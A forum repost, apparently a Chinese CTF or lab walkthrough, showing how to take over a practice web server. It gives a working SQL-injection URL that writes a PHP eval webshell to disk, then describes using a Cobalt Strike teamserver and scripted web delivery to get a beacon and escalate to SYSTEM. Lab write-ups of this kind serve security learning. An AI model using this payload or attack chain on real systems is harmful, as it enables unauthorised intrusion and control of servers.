大神论坛

找回密码
快速注册
查看: 16 | 回复: 0

[CTF] 转帖 【CTF】CobaltStrike超简单自动化拿域控学习!

主题

帖子

5

积分

初入江湖

UID
137
积分
5
精华
威望
10 点
违规
大神币
68 枚
注册时间
2021-07-07 22:51
发表于 2021-09-10 23:09
本帖最后由 大神论坛 于 2021-09-10 23:09 编辑

前言

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

工具:CobaltStrike 3.14 学习

最近学习CobaltStrike,所以写一篇关于CobaltStrike的姿势

拿到shell上蚁剑

http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'


②蚁剑连接,发现权限很低

CobaltStrike超简单拿域控

由于大部分师傅可能都不知道CobaltStrike是啥,我说一下怎么开teamserver,和启动CobaltStrike,具体原理请百度

一、启动CobaltStrike

1、先将CobaltStrike放入kali中,然后启动teamserve命令

./teamserver 192.168.1.105 123456

2、在我的电脑中启动CobaltStrike,连上50050端口密码123456,主机是我们刚刚设置的ip地址也就是kali的ip地址,具体看图

二、脚本web传递拿beacon

1、打开监听器,反弹http的beacon,监听我们内网穿透的端口和地址

2、在攻击里面找到脚本web传递

2、按图设置

3、将生成的代码保存起来

4、在蚁剑中执行这段代码就可以拿到shell了

5、接着CobaltStrike自动就上线了

6、提权就成功了选择自己一开始的监听器

7、接着就反弹一个system的beacon